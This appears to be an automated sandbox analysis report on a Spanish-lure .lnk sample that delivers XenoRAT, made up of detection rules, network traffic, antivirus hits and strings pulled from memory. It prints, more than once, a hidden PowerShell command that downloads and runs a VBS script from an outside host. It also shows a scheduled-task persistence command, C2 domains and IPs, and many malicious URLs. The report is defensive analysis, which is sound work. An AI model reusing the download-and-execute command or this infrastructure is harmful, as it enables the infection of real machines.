                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7408, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Scheduled temp file as task from temp location
                        Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentProcessId: 8084, ParentProcessName: GFKMTE.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, ProcessId: 7828, ProcessName: schtasks.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:52:28.060737+010020283713Unknown Traffic192.168.2.74970194.156.167.57443TCP
                        2024-12-09T06:52:37.409124+010020283713Unknown Traffic192.168.2.74972852.123.243.181443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdyt.CMD;.VBS;.OAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrsslAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfu#Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsVBE;.JSAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsj.dllAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuEEAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdy3Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfPPjAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhg00jAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exeAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdrhAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgh~~oAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryl~Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgWAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfgAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??oAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthBAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfgAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtglesAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgData=C:Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhiAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsrAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiioAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfTToAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgtAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdfAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tdAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docd.dlluAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsqAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/dPT32.dllAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbsAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/doapi.dllAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghppjAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythOFILE=C:Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzspAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsd:Avira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufAvira URL Cloud: Label: malware
                        Source: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdEAvira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\user\AppData\Local\Temp\ .docAvira: detection malicious, Label: HEUR/Macro.Downloader.MRDO.Gen
                        Found malware configuration
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpackMalware Configuration Extractor: XenoRAT {"C2 url": "dns.stipamana.com", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
                        Multi AV Scanner detection for submitted file
                        Source: TRANSFERENCIA COMPROBANTES.lnkReversingLabs: Detection: 39%
                        Source: TRANSFERENCIA COMPROBANTES.lnkVirustotal: Detection: 44%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\ .docJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: TRANSFERENCIA COMPROBANTES.lnkJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49701 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.123.243.181:443 -> 192.168.2.7:49728 version: TLS 1.2
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: *n.pdbzj4 source: powershell.exe, 00000001.00000002.1436897425.000001BD455E2000.00000004.00000020.00020000.00000000.sdmp

                        Software Vulnerabilities

                        barindex
                        Document exploit detected (process start blacklist hit)
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 012717B0h22_2_01270B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 030517B0h23_2_03050B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 030517B0h23_2_03050B53
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 04CF17B0h24_2_04CF0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 4x nop then jmp 04CB17B0h26_2_04CB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 4x nop then jmp 02FB17B0h27_2_02FB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 4x nop then jmp 018C17B0h28_2_018C0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 014D17B0h32_2_014D0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 4x nop then jmp 00EF17B0h35_2_00EF0B60
                        Source: winword.exeMemory has grown: Private usage: 1MB later: 91MB

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.167.57 443Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: dns.stipamana.com
                        Source: global trafficTCP traffic: 192.168.2.7:49886 -> 87.120.121.160:4567
                        Source: global trafficHTTP traffic detected: GET /vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs HTTP/1.1Host: www.stipamana.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 87.120.121.160 87.120.121.160
                        Source: Joe Sandbox ViewIP Address: 94.156.167.57 94.156.167.57
                        Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 94.156.167.57:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 52.123.243.181:443
                        Source: global trafficHTTP traffic detected: GET /docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.stipamana.com
                        Source: global trafficHTTP traffic detected: GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.stipamana.comConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs HTTP/1.1Host: www.stipamana.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.stipamana.com
                        Source: global trafficHTTP traffic detected: GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.stipamana.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bF43EFEF1-5530-47E1-A9BD-92EAF33B7348%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bA0E72725-605B-4822-B4DB-BD5E739C51EF%7d&LabMachine=false HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipIf-None-Match: ""User-Agent: Microsoft Office 2014DisableExperiments: falseX-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130Host: ecs.office.com
                        Source: global trafficDNS traffic detected: DNS query: www.stipamana.com
                        Source: global trafficDNS traffic detected: DNS query: dns.stipamana.com
                        Source: powershell.exe, 00000001.00000002.1436897425.000001BD455B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                        Source: svchost.exe, 0000000D.00000002.2522223189.000002DD7EC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: svchost.exe, 0000000D.00000003.1409195872.000002DD7E9B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2E3B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                        Source: powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.7
                        Source: powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2DDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.stipamana.com
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                        Source: powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000D.00000003.1409195872.000002DD7EA09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 0000000D.00000003.1409195872.000002DD7E9B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2E3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: wscript.exe, 0000000A.00000002.1489540789.000002942EB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485573797.000002942EB5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.
                        Source: wscript.exe, 0000000A.00000002.1489540789.000002942EB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485573797.000002942EB5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.c
                        Source: wscript.exe, 0000000A.00000002.1489540789.000002942EB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485573797.000002942EB5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.co
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2DDAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com
                        Source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/YPTSP.dll
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/dPT32.dll
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/doapi.dll
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docd.dllu
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdrh
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryh
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhs
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsf
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfg
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfgh
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghd
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdf
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfg
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghd
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfPPj
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfh
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhg00j
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/td
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgS
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgt
